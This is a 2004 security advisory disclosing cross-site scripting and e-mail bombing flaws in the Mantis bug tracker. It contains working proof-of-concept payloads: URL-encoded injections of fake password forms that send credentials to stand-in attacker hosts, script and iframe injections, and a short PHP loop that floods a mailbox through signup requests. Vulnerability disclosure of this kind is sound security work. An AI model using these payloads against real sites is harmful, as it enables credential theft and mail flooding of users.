Multiple Vulnerabilities in Mantis Bugtracker
---------------------------------------------------------------------------
Multiple vulnerabilities in Mantis
Bugtracker
---------------------------------------------------------------------------
Author: Joxean Koret
Date: This year, 2004 :) between June and
August
Location: Basque Country
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mantis Bugtracker
Mantis is a web-based bugtracking system. It is
written in the PHP scripting
language and requires the MySQL database and
a webserver.
---------------------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~~
A. Multiple Cross Site Scripting Vulnerabilities :
A1. The first vulnerability that I found is this : You
can login in anonymously and,
when do you want to perform a privileged action
you need to re-login with any valid
user. The previous URL is passed as the return
parameter to the login_page.php script.
This parameter is not correctly sanitized when
showing/parsing and we can put any
html/script code that we want. To try the first
vulnerability copy the following text
and paste in the location bar of your favourite
web browser :
http://<site-with-mantis-bugtracker>/login_page.php?return=%
22%3E%3Ch1%3EHello!%3C/h1%3E%
3Cform%20action=%
22http://malicious.site.com/script.xxx%22%
3EPlease%20type%20your%20password%20:
%20%3Cinput%20type=%22password%22%
20name=%22your_password%22%3E%3Cbr%
3E%3Cinput%20type=%22submit%22%
20value=%22Give%20me%20your%
20password,%20please...%22%3E%3C/form%
3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%
3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%
3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%
3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%
3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%
3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%
3E%3Cbr
A2. Register New User Xss Vulnerability
-The second XSS problem is in the script
signup.php (for example,
http://bugs.mantisbt.org/signup.php). [^] This
scripts registers
a new user. The problem is that the script's
doesn't sanitize properly the passed e-mail
when showing/parsing. Now, we have
the second XSS problem that I found. To test it,
please follow these steps :
- Navigate to
http://<site-with-mantis-bugtracker>/signup_page.php
[^]
- In the username field type any username
that you want
- In the e-mail field type this text : <iframe
src=http://www.playboy.com></iframe> or
<h1>Hi!</h1>
A3. Select Project XSS Vulnerability
------------------------------------
-I will no explicate the problem because is the
same all times. Try the following URL please :
http://<site-with-mantis-bugtracker>/login_select_proj_page.php?ref=%
3Cbr%3E%3Cform%20action=%
22http://my.fucking.site/xxx.sss%22%3E%
3Ctable%3E%3Ctr%3E%3Ctd%3EUsername:%
3C/td%3E%3Ctd%3E%3Cinput%20type=text%
20name=user%3E%3C/tr%3E%3Ctr%3E%
3Ctd%3EPassword:%3C/td%3E%3Ctd%3E%
3Cinput%20type=password%20name=pass%
3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%
20colspan=2%3E%3Cinput%20type=submit%
20%20value=%22login%22%20onclick=%
22javascript:alert('hi')%22%3E%3C/td%3E%
3C/tr%3E%3C/form%3E
A4. An other XSS Vulnerability
- Try the following URL :
http://<site-with-mantis-bugtracker>/view_all_set.php?type=1&reporter_id=5031&hide_status=80<script>alert('hi')</script>
----------------------------------------------
B. Possible E-Mail Bomber.
- That's fun! We can create a simple program to
send too many e-mails to the same e-mail
address by simply changing the username.
For example :
1.-Navigate to
http://<site-with-mantis-bugtracker>/signup_page.php
2.- In the username field type test0
3.- In the e-mail type test@xxxxxxxx
4.- Send it.
1.-Navigate to
http://<site-with-mantis-bugtracker>/signup_page.php
2.- In the username field type test1
3.- In the e-mail type test@xxxxxxxx
4.- Send it.
If do you want to try the problem you can use the
following simple script :
======================================================================
mantis-email-bomber.php
<?php
//Please, change it becuase is my e-mail :)
$email = "anyemail@address";
$base_user = "test";
$i = 0;
$site = "http://<site-with-mantis-bugtracker";
for ($i=0;$i<=15;$i++)
{
echo("Sending e-mail number $i\n");
$user = "$base_user$i";
echo("New user is $user\n");
$url =
"http://$site/signup.php?username=$user&email=$email";
echo("URL is $url\n");
$fd = fopen($url,"r");
echo("E-mail $i sended\n");
fclose($fd);
}
?>
======================================================================
---------------------------------------------------------------------------
The fix:
~~~~~~~~
Vendor is contacted and all the bugs are
correcteds in the CVS version at
sourceforge.net site.
---------------------------------------------------------------------------
Contact:
~~~~~~~~
Joxean Koret at
joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es